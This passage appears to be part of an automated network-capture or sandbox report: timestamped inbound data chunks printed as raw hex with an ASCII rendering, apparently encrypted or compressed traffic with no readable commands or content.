5b 5e d9 f8 c4 2e 55 51 b9 b6 8d d5 42 7e 7c 70 99 f2 5f 07 45 b1 0f 04 ff 7f c3 f8 d0 fd 06 c3 8b f5 df 1a 02 4a 9c a1 95 6f a1 Data Ascii: jX\%6Q@b{m}v1\|hv"qe)9//GLfPL0Ge0;WAR278k jBKHiUS\|N{\|zw%h/92<`d3d:(#4Y7HrG];ATp~)yF(Qo<#,[^.UQB~\|p_EJo
2022-01-28 21:14:32 UTC	124	IN	Data Raw: c2 f9 e8 d8 aa fa 5d 42 09 2f 77 0d 28 af b3 0d 1d a0 27 9f 46 fd 92 e6 d1 f4 00 a9 1a 27 39 cf f6 e7 62 00 9e 5e a9 5a 45 f8 ec 2d 4b f2 fe b9 34 54 ef 97 86 0d eb 79 de 31 9c 31 e4 db bd 46 c1 ca 03 e1 99 f7 da 18 2f 23 1c 32 d7 3e c1 49 16 6c f8 01 76 67 67 e8 58 78 1e 46 19 a9 8d e4 b2 59 60 c8 c6 1e bb f5 45 6d f3 77 d8 19 90 0e ca 8c 0d e9 bd 42 3f a4 04 4e b1 a2 60 79 df dd 8c f0 13 6d cd 44 4f 98 e4 69 fa bf 35 2d 2a da 5c a4 97 d0 15 af f3 09 76 83 03 46 e6 16 7b 40 4d 3b 40 36 fc 76 d2 f2 f6 3a 85 41 4c 20 89 36 4e 7f b8 a6 ba 03 8a 1f 7d 2b 99 b8 ba 04 7b 54 57 d6 b0 b6 f6 19 56 20 40 b8 5a cd ea 6d fc 1a 0b 2f 7f 22 33 da eb 9f d8 9a 90 db 84 ae e5 62 3e a3 42 05 92 bc 0d 6a 12 68 2d 9b 2a 0d 86 5c c3 ab b9 39 d6 c1 ed 6b 95 a8 e7 7c 31 26 70 Data Ascii: ]B/w('F'9b^ZE-K4Ty11F/#2>IlvggXxFY`EmwB?N`ymDOi5-\vF{@M;@6v:AL 6N}+{TWV @Zm/"3b>Bjh-\9k\|1&p
2022-01-28 21:14:32 UTC	127	IN	Data Raw: 53 d0 eb 1b 39 12 1e 18 ff d0 0d 5c 44 15 65 25 f0 85 5d d5 a6 c9 00 fe 1d 0c b0 43 1d 54 a5 34 f1 e9 07 f0 bb 5e e0 6d 2d 55 c0 85 34 12 12 7b 4c 1d c1 a4 2e e5 db 4b 1e 42 39 87 a5 45 ec 6b be aa 0c 5b 3a 4c 5e fb f0 30 3f ff 0d f1 33 66 cc c0 c4 04 db 13 e0 f6 4f 18 42 2e 8b 5f 4e 82 9d 72 0b ea 00 cd b3 3b 49 e1 f1 d4 51 47 66 c9 5f 2c d7 38 02 63 96 5d f1 9b d7 39 a2 fc bc 86 2f 79 e2 08 b8 2e eb 90 fb 29 2d a3 3b 2b 24 3f 7c 68 98 11 01 93 45 bb 90 e1 a4 d8 8d 0c 36 9d 7f 4a 4f db e5 b0 d5 05 09 a8 43 2b 4c ba 61 24 e1 13 7f b1 b7 57 0e 94 ce 91 1b 26 9a a8 d8 82 84 2c 1f a0 8a d3 05 e3 18 91 95 0c 82 b1 e8 ae 89 bf 3b de d3 40 82 60 2d 65 4d 9a af 91 1b ea 12 7d 61 4f 1f fd 6c 5b a7 d1 05 eb 9b 6c 7b 68 98 21 7f ef da ea 4e a2 8c 3a 31 25 b9 36 da Data Ascii: S9\De%]CT4^m-U4{L.KB9Ek[:L^0?3fOB._Nr;IQGf_,8c]9/y.)-;+$?\|hE6JOC+La$W&,;@`-eM}aOl[l{h!N:1%6
2022-01-28 21:14:32 UTC	132	IN	Data Raw: 16 04 05 e3 c7 aa 6a 88 64 58 33 82 61 b6 06 84 3c 8d 4c 12 60 fd f7 7f 3a 11 99 7b 11 4b e5 d1 5f 26 60 fd f7 54 4e 68 c8 eb 43 a8 fa bf 02 08 b8 4f 67 fb 3d 3e 57 80 2d f0 b3 1d 01 15 48 df ab 48 4a 12 60 fd f4 a1 be 63 49 eb 5b a8 fa bf 02 0b 5a d9 5a 20 60 a6 c4 c9 4c 93 04 b1 f7 6c 20 c6 c2 68 76 74 26 60 fd f4 8d d5 dc d4 cb 3d 69 72 54 2e f7 60 fd f4 89 2e 52 1c 12 7a 9c c1 cf f4 34 60 fd f4 f7 6b 0a 8e a6 1c 60 fd f4 fb e7 cc f1 76 6d 60 fd f4 ec 4c 39 90 f3 60 fd f4 d7 78 69 08 7a 60 fd f4 df 54 63 2f 98 96 78 ef 5d d3 dc 69 11 61 56 a2 73 00 60 fd f4 c5 16 97 b7 41 24 ad ef 87 ac 60 fd f4 3a 23 b8 53 1f 7e 15 77 d3 e1 60 fd f4 27 be ea 11 d6 56 e0 60 fd f4 14 ed ee 99 6d 60 33 b8 5e e4 fb da 0b 66 bc e8 e2 8c 84 2c 15 d1 8c 44 9a f0 fa a1 3f 1c Data Ascii: jdX3a<L`:{K_&`TNhCOg=>W-HHJ`cI[ZZ `Ll hvt&`=irT.`.Rz4`k`vm`L9`xiz`Tc/x]iaVs`A$`:#S~w`'V`m`3^f,D?
2022-01-28 21:14:32 UTC	136	IN	Data Raw: 14 fa ca 3f bc aa 2f d0 f8 e9 26 8a 33 02 25 6c e0 d1 1e f0 c3 db 0a 47 b3 b2 cd b7 4a 7e 27 b7 e9 81 7a e5 0a 70 39 d8 69 6b 82 7d 1b 06 dd be 81 28 a4 4c e3 b3 99 7a 21 31 46 56 6f e0 ac 0e 23 8a cd 29 ca 23 34 68 92 a3 f5 9f 5d 50 2a e6 89 24 7e 4c c9 5f a6 8a 4c e8 ff dd 05 8f e6 d9 18 5f 6e 50 58 8b 42 df 07 d4 23 11 7e 66 80 c3 fa 73 ad 67 49 70 73 4a 48 3a 98 30 80 e7 08 29 b4 0a 35 e5 16 93 93 c3 d3 91 8d 32 0a 04 be 92 17 cc 6e 19 61 be 9c 4e b8 54 ef de a8 cb 18 68 cd e2 88 97 8a 2b 05 2a fd b4 4c 66 b7 c0 70 bd ff 9f 04 38 a3 3f 8c 3b 5b 27 00 33 27 67 f1 94 77 f1 9a 3a a7 20 f2 1c 70 39 f5 7c e0 31 5b 83 42 c5 66 04 9c 47 2a bc 6b 15 2a 49 46 77 18 ca 94 27 37 96 11 02 78 7b 05 69 c8 1d a9 b3 e5 38 31 c3 d1 25 4b 2b c8 2f 47 0e e0 e9 fe c8 9e Data Ascii: ?/&3%lGJ~'zp9ik}(Lz!1FVo#)#4h]P$~L_L_nPXB#~fsgIpsJH:0)52naNTh+Lfp8?;['3'gw: p9\|1[BfGkIFw'7x{i81%K+/G
2022-01-28 21:14:32 UTC	140	IN	Data Raw: 28 00 52 3c c3 0b 39 bb 2a 79 fe a7 4f 60 4c 75 58 f1 0e cf 65 f7 40 6d 7e 9e ef d3 f2 60 ae 9e a2 0b 56 17 d9 e6 fb 29 72 d9 b7 dc 2e c0 21 b9 8e 36 98 ca f6 bf 6c ed 61 01 93 09 a7 e7 8b c1 d2 ec 0a 40 e6 25 cd 98 3c d4 47 8f 30 3b 56 9c 16 45 60 5a 29 d6 32 61 cb 26 8c 5a 1e 81 c9 aa a7 a8 05 08 57 c4 78 e7 22 a9 c9 45 5d ca 11 76 53 3a 18 2f 79 fb f2 38 38 5c f0 e4 9e af e3 3b ea 1b 22 4d 57 40 4e 7c d6 de 74 7a b8 9c 52 8d 84 0a b0 21 e5 58 49 39 29 19 19 f7 4c 11 4f cc 8a 66 fe ab e5 a6 5c 7b 7e ba 39 55 19 6a ad 55 48 7b cb 89 24 55 54 3a ed 1b 1b de 88 5d 02 c9 11 77 a5 91 d4 57 92 a5 e0 bc f4 61 39 8b f7 14 90 ca 4c 0f cf fb 8d 45 55 43 15 80 09 dc e1 04 88 18 07 51 2e 5e 37 ef a3 75 06 ca 55 ba 67 98 1e 47 6f fa 4e 36 e8 a6 8a 2c c0 ca 2d fc 62 Data Ascii: (R<9*yO`LuXe@m~`V)r.!6la@%<G0;VE`Z)2a&ZWx"E]vS:/y88\;"MW@N\|tzR!XI9)LOf\{~9UjUH{$UT:]wWa9LEUCQ.^7uUgGoN6,-b
2022-01-28 21:14:32 UTC	144	IN	Data Raw: a9 ad 31 1b 4f 97 d9 f3 ba 75 46 ca 9b 81 ea 57 e3 96 c8 f1 f5 55 43 89 65 f6 2f 64 0d d1 38 23 9a ac 1e dd 73 a4 39 86 fd 54 c9 06 86 bc 73 1e af 68 b2 a4 d3 1f 34 20 79 4e e3 a8 50 d7 34 02 f5 ce a9 61 f4 87 5e 00 ee 27 46 e3 79 e5 ec e1 25 3f 43 d7 8d ea 92 a8 63 ff 50 03 09 0c d7 55 42 ec 76 90 63 c4 6e ab 5d 71 41 8d 51 b3 17 a1 3e c3 87 00 e2 bd 73 8f 4c 6c 5b ba 09 82 96 ad 77 fb ce 8e 9a 7b b8 98 fd 47 9c 05 01 18 d5 1a 19 23 99 62 90 20 4f 0a 9d b3 b7 75 7f 83 17 e3 ae b2 25 cd 0a d5 fd 05 86 30 79 2b ce c6 a0 a8 9a 56 9f 98 0f 39 99 ba ea b3 c0 65 3e af 0c c4 ec c8 63 1e 80 e6 d6 ad a7 59 ce 1d 34 a8 20 a0 ca 18 a8 09 52 f8 55 53 f5 66 fd 95 dc 5c 9c e0 92 b1 17 7c e1 b6 c7 1a 46 d4 ea 96 d8 a8 35 6a e8 c8 87 a1 88 31 8c 68 ca 09 58 3a 0d 41 e5 Data Ascii: 1OuFWUCe/d8#s9Tsh4 yNP4a^'Fy%?CcPUBvcn]qAQ>sLl[w{G#b Ou%0y+V9e>cY4 RUSf\\|F5j1hX:A
2022-01-28 21:14:32 UTC	148	IN	Data Raw: e5 c5 9f 3c 8b bf 48 c9 28 0f 6b fc dc 9c 0e 96 6e 41 75 77 fc 2e 9c bd ab 12 6d b7 00 6b aa df d0 f3 38 d3 20 5d 48 bb d5 0d 4b a2 96 8c cb b2 41 4f b1 e8 60 04 2b 40 8a 5a 49 60 ad b2 96 12 24 50 43 4d 84 32 30 93 91 a5 7e 61 09 a8 57 6f d8 d1 7e 9f f9 a4 f9 49 1d b0 51 3b 61 1a 9d 56 90 3b 23 26 fe 47 7e 91 11 ac 0a 4a c2 be bf d3 64 18 2c 78 c3 cb 02 87 64 47 6a fe 7f 15 82 08 74 a4 d2 e7 35 2c 0d 12 10 85 0b 04 7b cf 0d 76 6c d0 bd c8 f1 a6 e2 e8 82 87 e7 e9 e4 f5 a9 9c b9 68 8b 1c b4 d4 39 4e e4 50 8a 1b 28 ca 5b ad a4 d5 22 0e dc 86 aa 01 fc 2a fc 80 6e 3f 69 21 32 89 b4 39 a3 4b b5 59 16 1f ca a1 c6 1d d3 a5 3c 5b 2f 52 6e 57 c5 30 46 78 99 b5 14 1e a9 a3 62 45 69 c2 9d f6 05 62 7e 2c 3f 13 d8 9a 7a c8 0f a6 db 31 34 7f ce 25 59 0d db 2f c1 3e 04 Data Ascii: <H(knAuw.mk8 ]HKAO`+@ZI`$PCM20~aWo~IQ;aV;#&G~Jd,xdGjt5,{vlh9NP(["*n?i!29KY<[/RnW0FxbEib~,?z14%Y/>
2022-01-28 21:14:32 UTC	152	IN	Data Raw: f6 c2 b4 7e 4a 50 f7 53 fe 11 1c ef 54 57 f6 ce e5 2b 5e ef ff 32 83 09 e5 b3 70 9d 1e df 51 e2 d3 26 ab 8b 38 c6 e2 70 8e aa fc fd 3f 18 c6 19 d3 94 6d 29 1f df d4 34 79 02 df a0 c5 e0 3f f8 3a 6f e9 85 c9 d0 a7 3e c8 3c dd c1 1d 66 1d 25 51 ad f0 b7 79 f2 81 98 37 ec 94 fe f1 f8 30 51 de a7 c1 58 2c 9b 5e ab 04 61 23 40 1a a1 7a ad b9 0c fc 0f ad 35 55 96 bd 8b 53 bf 93 e6 38 ff d8 ed e2 13 66 80 5d 27 d1 6f af d5 44 0f c2 e5 f0 27 3a ff 8b e0 34 d7 09 fd a1 44 f2 09 69 ea 94 65 d3 14 ac 2e 0f 9c 06 f8 3c 40 57 c5 8d 4e 65 90 2a bd b2 bc 6a 9e de be c1 ae 9d 55 4f 90 35 44 1a 0d 1f c0 94 45 fb 9b e7 c8 75 86 3e 70 57 e2 4e 46 5e 25 f4 88 03 3b 34 97 1d 86 48 19 0c 26 5a f0 4b f5 bc 66 c0 4d a4 3a e8 5d 7c d5 ba 11 f5 3c 4e 79 aa f7 75 00 7f a0 c8 fb 24 Data Ascii: ~JPSTW+^2pQ&8p?m)4y?:o><f%Qy70QX,^a#@z5US8f]'oD':4Die.<@WNe*jUO5DEu>pWNF^%;4H&ZKfM:]\|<Nyu$
2022-01-28 21:14:32 UTC	156	IN	Data Raw: 14 7b cb 03 18 9d 33 1d 88 5a 4f f0 71 5f 94 46 28 b4 af 0e 89 b4 da 86 bc ed ef 40 1c a6 7e 8e 7f e5 36 16 6b 77 00 98 61 c2 5c 1a 97 60 aa 59 c3 e6 8c da 02 bc 28 5e 0a b2 f2 f4 71 b5 5c 15 a9 ec d0 8c 3d 89 f3 af 80 6e 97 d6 68 92 9c ee 88 af e1 c8 79 bd 92 e4 fd fe 86 c9 89 c0 ae ff e6 6b ab 62 34 b3 73 ab ce e3 e9 3d 51 0a 30 b6 64 86 10 65 7b 73 b7 bc c2 30 36 04 3e 1b 98 82 fb 30 58 91 aa f9 cd a9 0f 1e 4e d0 91 52 4d 5f 3e dc 87 df a4 cd 95 46 bb c4 9f 08 26 b3 48 e2 ca 92 78 dc 38 2f ec c3 bd 9f 65 57 c8 4f 28 1c 43 15 aa b4 dc b4 bc da bd f9 c6 2c 44 0e 90 68 b3 de ed af 4a 7a c1 d5 af 00 45 23 44 21 04 51 a3 65 26 b6 b5 5b d0 18 16 ce ce b5 29 22 81 ae 69 7d 04 2e 1b 28 c5 e9 92 69 4b 6b a7 52 d1 f5 36 cd a6 95 ef e4 2c aa ff 70 bf 4e 1f 41 85 Data Ascii: {3ZOq_F(@~6kwa\`Y(^q\=nhykb4s=Q0de{s06>0XNRM_>F&Hx8/eWO(C,DhJzE#D!Qe&[)"i}.(iKkR6,pNA
2022-01-28 21:14:32 UTC	159	IN	Data Raw: 9d be b9 90 88 fc e9 60 66 92 c8 20 b4 00 c3 8c e0 c8 7e bb 80 f7 e7 9d 0e 4b 45 f6 9d 80 d4 14 46 4f a7 5a 8f 2c 94 cb ae 92 4e e7 b3 da 85 82 75 4c 35 24 06 14 7c b1 cf be 68 a3 69 06 3f 37 37 5e ef 9e ea b0 75 85 e1 92 93 a3 e7 d7 5a dc 5c 6c 17 c5 25 f4 69 31 92 07 0b 9c 29 83 a9 0e e7 e0 c1 39 88 01 35 ce f7 06 b2 af d5 03 b9 84 99 08 5a c9 36 32 f6 cb e2 6a 65 ef 5e 71 67 8f 75 61 31 45 e6 a2 97 1a d0 5e 90 be b5 6e 15 11 8c 56 8d 95 c4 cb fd af a0 bc 84 c5 21 e6 f3 f0 73 99 cd 96 e1 db b6 6b 39 d7 b1 8f d3 0a 7c f1 64 60 f2 67 ca 96 cd 9d 1b 44 d8 91 9b ab b9 6f 7e c6 05 36 ff fe b3 2f af 20 1c df 46 6d 02 fc a4 36 b4 12 40 f1 0b f2 70 2a 6a a7 99 4e ea a7 88 4a 3e 25 cf d2 15 82 07 ae 5d 61 bc c1 85 2a 9c 60 a5 2c d3 97 ca f0 5d f9 05 42 3c 09 5d Data Ascii: `f ~KEFOZ,NuL5$\|hi?77^uZ\l%i1)95Z62je^qgua1E^nV!sk9\|d`gDo~6/ Fm6@pjNJ>%]a`,]B<]
2022-01-28 21:14:32 UTC	164	IN	Data Raw: eb 8b 8b b2 f7 82 52 91 df 4a 9c a2 5f d9 64 fe 1c 4f 32 34 f3 2a 71 e4 0d 54 8e 93 95 7e d9 ac de f0 e2 1a d4 ea c8 a5 04 fb a9 d2 9f a5 89 0c 01 85 50 ff 72 38 4b 53 91 34 34 55 22 e8 0f e6 9b 8f be d2 5c e9 33 05 18 5e dd f4 02 25 b5 c1 6c 90 bd 92 2d 58 d2 2c bf 00 7d 13 46 6c 24 bd a9 64 8d 17 3d 6f 24 c4 2b 29 15 3f ed 89 5c 13 aa 05 b7 ac ec a5 43 d7 1c 1a 37 26 fc 71 1e e0 bb 87 be 4a 3b 76 c4 6e b0 1a b0 e9 b2 d0 81 ae 09 ed 6e c7 60 91 3d 26 d9 57 80 5b d2 06 0c d7 ae 1c ac 9a 20 8f 8c e0 58 2a 89 b7 59 9f bd a9 fb d1 23 ee 67 e7 b0 45 05 cf 13 db a9 91 0d a3 f4 dd 3b b7 a2 4a 7c 5b 76 19 41 20 2a 37 5b 96 b2 9f 60 1a 17 15 1a 30 c4 ff 37 3a 71 e4 4e 92 04 a5 cd 7e 29 f3 d9 81 61 3d d0 0e 22 fd 28 a2 6f ac 7c cb a8 c9 7e e5 d1 cb a3 3b 77 26 69 Data Ascii: RJ_dO24qT~Pr8KS44U"\3^%l-X,}Fl$d=o$+)?\C7&qJ;vnn`=&W[ XY#gE;J\|[vA *7[`07:qN~)a="(o\|~;w&i
2022-01-28 21:14:32 UTC	168	IN	Data Raw: 04 ed 74 ae 5b c7 53 1b b0 d6 5b 7b cf 2c 70 80 1e 08 f0 65 1b aa b4 81 2d b9 fd 5d 39 b2 29 09 0d 19 bd 44 a7 c5 ba b2 c7 0a 0b 35 3d a8 e9 00 40 6e 4a b2 54 f4 c5 4c b2 74 5f f5 3d 81 d8 71 a6 62 a1 08 a6 71 46 ae 13 35 d0 93 35 1b 95 4d 5c 92 91 b6 f3 02 9c ca 46 4c 09 1d 07 72 cb cc d6 19 9b 84 29 43 c4 b9 bd d5 6c 8d 28 ff 60 40 09 1b 5b 4b 1f 79 4d 28 f4 0c 76 5d 5c f0 09 4b a2 8f be b2 5f 5a 6a e9 4d a1 d2 5f 54 dd 31 7c 2f 78 81 fa 7f f4 06 be db 24 74 bf 5c c9 61 af 83 ba 4c bc f8 a9 c6 09 e4 3a 7b 11 2d e1 33 03 67 fe 03 81 6f ba a9 5a 78 28 73 58 ba a8 41 a4 d0 6c 22 05 1a 34 89 a6 a7 9f 20 60 84 50 24 5a 19 38 52 ed 0a af 2e ac ed 77 47 f4 fb 6a 57 ee a8 be 5e 33 28 b9 80 b1 2a 31 1c 30 ee e0 32 c6 01 e9 83 33 2f cc 93 e4 ac 97 6c d7 ec 1e d8 Data Ascii: t[S[{,pe-]9)D5=@nJTLt_=qbqF55M\FLr)Cl(`@[KyM(v]\K_ZjM_T1\|/x$t\aL:{-3goZx(sXAl"4 `P$Z8R.wGjW^3(*1023/l
2022-01-28 21:14:32 UTC	172	IN	Data Raw: 7e 36 91 d9 11 3d 4d 78 ef 7d 4a 4b 55 a7 68 f2 a4 d1 8a d2 68 27 77 19 a1 e6 a4 42 f1 b1 c9 95 f9 6e 7f 01 b7 05 cc 4c b5 b6 f8 fb b5 f2 4e 46 b2 8c 94 f1 81 02 dd e2 84 58 d5 5c 1d c0 54 56 de 1f 08 34 41 74 18 54 0e 9a c5 24 8c 8e 21 e4 8a 99 35 78 15 89 97 a9 12 23 66 12 c1 fe 55 10 25 0c 00 0c 45 af ae 72 91 72 c1 be 5c ce 42 bd 50 88 44 1f 7c d4 5a 38 df c0 9a 55 0f 1b e6 a5 5d 17 c9 e5 90 2b 35 ab 10 85 df e7 0b 22 ec d9 36 3a 55 7d 0f f0 ef 34 8e fe 74 be 9d 44 45 6b a7 d7 3a 90 2e 3c fb 27 77 4d 78 06 73 a8 1f 26 88 00 74 f2 49 86 ef cd a8 16 a3 4a 43 ee 49 54 c8 b3 35 27 88 7d 02 28 e9 4c d8 24 5a fc a7 f3 2d 19 4b 7f a8 4c 89 18 e9 a5 7d 5b 8b 74 a3 4c 50 aa 35 d0 86 c3 92 bd b6 bc 25 96 6a 21 92 84 63 f8 ec e8 31 98 42 42 ba 18 2f 2c 5b da a7 Data Ascii: ~6=Mx}JKUhh'wBnLNFX\TV4AtT$!5x#fU%Err\BPD\|Z8U]+5"6:U}4tDEk:.<'wMxs&tIJCIT5'}(L$Z-KL}[tLP5%j!c1BB/,[
2022-01-28 21:14:32 UTC	176	IN	Data Raw: 0f ad b2 a8 92 87 1c a7 a9 a0 f6 bd 5d 72 b8 ff 68 1a 0d a0 4d f6 f5 29 8f 8e 3f de 57 7f b7 47 10 54 e3 a2 96 88 d0 4f 22 49 c8 49 0d fb 88 19 82 28 4f 7b 95 78 29 b1 34 15 50 4e 46 78 7e 3f 0a 93 5e ee 1e da 8d 9c bd 01 db 3a ce 7f 12 79 de 6f 30 b9 1a 54 58 f0 90 54 7c 0c b5 58 bc 63 c9 b9 52 33 4e 64 54 d3 7d 69 04 23 fd e8 9a 38 2a 39 37 b8 7e 2b 59 fa fe 81 52 90 bd b8 6a f2 20 ed c2 b1 5c b4 58 74 57 02 72 9e 44 90 30 6a 6b 0f 1c 8d 69 aa 09 19 8a d6 33 d2 8f f0 89 98 f2 29 a1 92 a4 c7 72 36 3a 3b 8d e1 34 5f 13 64 d1 43 0a 0f 3d 88 bc a3 8d b2 16 18 f2 da df 22 d8 fa a2 47 d5 43 b5 6d 6d 97 55 8b d4 31 f1 4f 0c 10 0a 69 74 3e 41 4a 0f f2 07 04 08 ea 24 ca 93 0e 68 84 56 72 54 1d a2 ff e5 6a db d7 4b 49 5e 94 d1 32 b8 fc 3b 5b ad 65 bd c8 01 1c 5b Data Ascii: ]rhM)?WGTO"II(O{x)4PNFx~?^:yo0TXT\|XcR3NdT}i#8*97~+YRj \XtWrD0jki3)r6:;4_dC="GCmmU1Oit>AJ$hVrTjKI^2;[e[
2022-01-28 21:14:32 UTC	180	IN	Data Raw: cd 7d 50 23 6b d8 6f b0 2c f6 09 ec b8 4c 84 f7 00 52 d7 6e 56 fe fd 2e 81 26 47 18 a6 84 b3 05 88 00 47 a7 71 ac 0c e1 f8 1c af 8a 7e fb 2a f9 b8 47 d1 24 f6 56 4b 69 4d c2 e3 ae 71 a6 d4 d4 e8 cc 2a 18 b5 d2 51 04 2e cc 3e cf a4 2e f9 71 d6 13 96 90 3b 59 0b 52 d9 0f 3b b8 6d 1e 9c 87 82 c8 5b f4 70 13 09 08 cd 6b aa 4c fc 7b 74 2c da 5d d6 db b9 f2 dc ad 14 2f 85 61 80 2b b0 80 6c 83 59 56 05 68 0f 7a 12 6d 82 21 60 dd 84 43 a0 86 ce 38 60 78 14 0f 60 3a ec 8e f5 aa 0b 48 fe 28 6f 3c 45 1c 94 9f 3a 39 f7 10 67 1f 8d c2 e3 b7 d7 6f 6e b3 4c 22 1c 9e 5e c4 1d 67 c3 8e 8c c5 fb 57 ae 7a 21 20 39 22 87 9c b9 83 d4 2d 00 f3 1b b3 be c6 bf d8 44 1e 9c e5 7d 4e 79 0c e9 91 03 ae f2 0a 55 78 ec 26 4e f3 46 d9 34 41 d1 6e 6b f8 4b 7d db e3 69 b1 2c 55 f5 6d 45 Data Ascii: }P#ko,LRnV.&GGq~G$VKiMqQ.>.q;YR;m[pkL{t,]/a+lYVhzm!`C8`x`:H(o<E:9gonL"^gWz! 9"-D}NyUx&NF4AnkK}i,UmE
2022-01-28 21:14:32 UTC	184	IN	Data Raw: cf ac 4c d7 b5 51 8b 1b 9d b5 29 2a 8f e8 58 c8 4f 29 68 f0 05 74 99 69 bd c9 98 43 c6 86 7f d9 22 49 a0 54 a2 0e 51 64 e7 da 9b f8 d0 b3 19 37 22 fd c5 c8 5f 2b ae 3b 12 d8 f2 04 57 fb 9d be 48 51 55 ac ae 00 33 e5 0b 47 ee 7c b9 63 62 8c cd 50 99 aa 70 fa 15 fb b4 10 f1 cd 86 d8 e8 51 71 5c 23 4b e6 91 3a f3 7c 2a 62 0e 16 3f 2c f2 82 9d bc fe 3b 89 6f 7d 10 a2 51 ea 98 6f c7 a3 a8 fc d7 27 7e 7c 20 d1 3b fe 37 a4 d2 06 85 8a f5 2e 2a b3 ca d5 7e 04 8c 63 6f 92 03 a9 cf 53 45 86 ab 06 87 a6 d9 87 dc 59 2e 7b 3c 8e 67 0f 59 98 fb ac f2 5b 1f 4a d0 4c c2 9b 7f 35 5c ec ec 12 7a 79 c2 84 81 76 d0 dc 77 17 4a 33 d3 8a 4e 36 6a db 25 ea e7 52 4d 9e f4 4a 2c 6a a9 6e fb 1e 4c d5 dc 17 13 96 cd cc 0f 41 ba 9d 20 08 53 37 98 cf bc 69 ca 2c bf 81 d4 e8 3f cc b0 Data Ascii: LQ)XO)htiC"ITQd7"_+;WHQU3G\|cbPpQq\#K:\|b?,;o}Qo'~\| ;7.*~coSEY.{<gY[JL5\zyvwJ3N6j%RMJ,jnLA S7i,?
2022-01-28 21:14:32 UTC	188	IN	Data Raw: 0c 37 47 cd 47 15 e2 6e dd 05 46 49 8c 9d 08 c2 ee fc 4a c0 16 38 b7 ac a5 58 9a 4c 68 d7 b3 21 03 10 02 f8 82 e5 12 c1 67 7a 38 72 27 59 2f 77 13 46 e1 af de 86 eb 9e da 30 37 13 ff a8 81 b5 f3 7c 27 46 e4 7a 27 7a 3e f9 5f 6e 0c 8b 62 63 86 84 e3 ac 5e 8c 44 04 ce 38 2f 82 b0 75 73 14 b9 2d 4f 56 aa 64 3a c1 8a 1a 7e 7d 88 2a e1 c2 09 da 1b 8a 68 c6 b2 bd 29 c1 ae a7 e3 95 a8 cf e2 85 9f cd 93 6f 3b 30 1b 7d 05 a9 4b 29 95 65 6e 4a 42 d3 e1 8b 91 16 7e 31 29 61 bc 3a e7 84 8f 83 38 0a 9c 8b 2c ef 3f 5f fa 4a 04 55 77 36 e7 e3 1f 4a 2b 84 1d 31 8f 50 02 ab d3 d4 f5 c7 14 73 9b 01 a3 33 03 89 e2 56 cd 37 3f 25 25 2f bc df 6d 87 13 2c 1e 69 f1 36 ff db 83 26 ac b6 94 2d af 20 67 7a 74 a0 a1 47 3d d6 de c2 d4 6f b0 ad 4d 35 e1 c8 e0 16 ee d4 ec 2a 4d dd 35 Data Ascii: 7GGnFIJ8XLh!gz8r'Y/wF07\|'Fz'z>_nbc^D8/us-OVd:~}h)o;0}K)enJB~1)a:8,?_JUw6J+1Ps3V7?%%/m,i6&- gztG=oM5M5
2022-01-28 21:14:32 UTC	192	IN	Data Raw: af f1 94 7d c6 e5 e8 ad c7 4c f3 ff ba 5f 17 03 60 cc 5e 73 ad e7 20 d8 c5 32 ee 24 00 bc 67 2a fa da b4 80 64 f6 46 b8 3c c1 19 7c 4a cc 16 6c c1 3d 85 7c 9a 97 d3 ec 29 a1 8d 35 8f 1d 48 2d 61 88 22 1b bd 25 b9 53 51 b6 83 68 9b d2 6c 55 41 43 c5 84 bc 99 3a c1 41 d5 1b c9 ed 3d 57 e1 26 09 88 0c 11 4e 1d 41 91 fb 2d 49 2e 24 9d 49 3d de e1 87 9a 6a 3a 94 b1 6f f3 8b e6 d3 43 eb 35 ff 9b 37 ee 6c eb ba bc 7e 12 43 3a c2 39 ba 7a 07 53 fe 62 aa b4 aa a4 0b c3 11 5c 31 2d e1 d3 f5 5f 5d e2 a7 85 ab 7f 28 49 88 24 91 85 a8 bc 1e 0b f5 51 3a 1c 09 7f 9b 46 98 b2 39 51 b5 eb 08 0c 72 55 ac 6b 56 8e fa 9c b2 8f 11 b9 a1 10 b3 c7 c1 1b f4 b7 d4 b0 62 2b 32 12 3f 3c 6b c7 bc 02 cf ae d5 7b de d7 d6 58 a6 5b ba 55 c6 e3 47 57 1e 6a 94 00 39 6c 74 fc 10 4e 33 6a Data Ascii: }L_`^s 2$g*dF<\|Jl=\|)5H-a"%SQhlUAC:A=W&NA-I.$I=j:oC57l~C:9zSb\1-_](I$Q:F9QrUkVb+2?<k{X[UGWj9ltN3j
2022-01-28 21:14:32 UTC	196	IN	Data Raw: f3 1c c1 29 08 f4 ff c4 ec 05 cf 62 3f 05 f6 3c 53 7e 47 ec 7a 81 d0 70 30 cd 6e 3a c4 e7 14 74 f9 50 de 7a 6a 81 1d ab 9f a5 e1 96 22 31 45 50 9e 41 e5 36 6e 49 7c 6c 67 94 8d a4 75 7c c8 91 e4 b9 2d 40 2f 4d 0c 39 c1 d0 54 23 61 2c 4a 30 ad be a9 79 1a b0 c8 65 67 26 46 11 b2 11 4e 30 2b da 7a 4b 84 a0 79 d3 61 5d 2e a8 53 29 15 e5 d9 ba 05 33 ec 7a e7 c2 46 61 be 83 88 42 1a 41 d2 9b 0f 6b 49 5b 4c 21 14 48 c7 f6 15 91 f6 e4 09 8d 6e 1b db 92 49 61 78 39 2b cb b7 95 62 83 68 1f 9f 87 ae 4f ab a5 98 5a 23 3a 75 0d 14 31 09 72 8c a5 da fa 9c e5 f5 23 0c 5a a7 2f 06 90 e7 f0 0b 37 3c 8a a7 09 73 8c 10 9b 9c 09 9d 9a 48 5b c1 41 1c 42 90 4f 2c 78 72 76 0e 16 ab 71 d0 c3 1e 5d dc 84 5f da 36 34 cb d8 39 c7 57 53 3d 1d 6d 1d e8 2b cb 03 74 cf 6f fe 15 eb 3f Data Ascii: )b?<S~Gzp0n:tPzj"1EPA6nI\|lgu\|-@/M9T#a,J0yeg&FN0+zKya].S)3zFaBAkI[L!HnIax9+bhOZ#:u1r#Z/7<sH[ABO,xrvq]_649WS=m+to?
